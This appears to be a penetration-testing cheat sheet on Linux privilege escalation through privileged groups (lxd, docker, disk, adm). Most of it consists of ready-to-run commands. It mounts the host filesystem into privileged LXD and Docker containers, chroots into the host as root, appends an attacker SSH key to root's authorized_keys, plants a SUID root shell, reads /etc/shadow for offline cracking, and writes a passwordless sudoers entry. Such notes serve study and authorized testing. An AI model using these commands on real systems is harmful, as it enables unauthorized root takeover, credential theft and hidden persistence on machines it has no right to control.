Skip to content

Privileged Groups

LXC / LXD

  • LXD is like docker and is Ubuntu's container manager.
  • upon installation, all users are added to the LXD group
  • used to escalate if user is a part of this group

Steps

  • check if user is a part of this group
    • id -> 110(lxd)
  • unzip alpine.zip
  • lxd init
    • choose the default option for each prompt
    • help - https://www.digitalocean.com/community/tutorials/how-to-set-up-and-use-lxd-on-ubuntu-16-04
  • lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine
    • import the local image
  • lxc init alpine r00t -c security.privileged=true
    • start a privileged container with the security.privileged flag set to true to run the container without UID mapping. This will make the root user on the container, the same as the systems root
  • lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true
    • mount the host file system
  • lxc start r00t
    • gets inside the Alpine image
  • lxc exec r00t /bin/sh
    • spawn a shell inside the container

Docker

  • if a user is a part of the docker group, we can create a new docker instance by mounting the /root directory as a volume.
  • docker run -v /root:/mnt -it ubuntu
  • This could be done for other directories such as /etc which could be used to retrieve the contents of the /etc/shadow file for offline password cracking or adding a privileged user.
  • retrieve ssh keys, creds, add other users
  • One Liner to exploit the docker group
    • docker run --rm -v /:/mnt -it alpine chroot /mnt /bin/bash
  • Add SSH Host keys 
    docker run -v /root:/mnt --rm -it alpine sh -c \
  "echo 'YOUR_SSH_KEY' >> /mnt/.ssh/authorized_keys"
  • Create SUID Binary 
    docker run -v /:/mnt --rm -it alpine sh -c \
  "cp /bin/sh /mnt/tmp/rootshell && chmod 4755 /mnt/tmp/rootshell"

# On host:
/tmp/rootshell -p  # -p preserves SUID
  • Direct root shell 
    docker run -v /:/hostfs --rm -it ubuntu bash
# Then: cat /hostfs/etc/shadow
# Or: echo 'user ALL=(ALL) NOPASSWD:ALL' > /hostfs/etc/sudoers.d/pwn

Disk

  • disk group users have access to any devices container within /dev like /dev/sda1
  • debugfs to access the entire file system with root privileges.
  • retrieve ssh keys, creds, add other users

ADM

  • ADM group members can read logs at /var/logs

  • not root but could be leveraged to gather sensitive data stored in log files or enumerate user actions and running cron jobs.

  • grep -r "flag" .

  • https://linux.die.net/man/8/aureport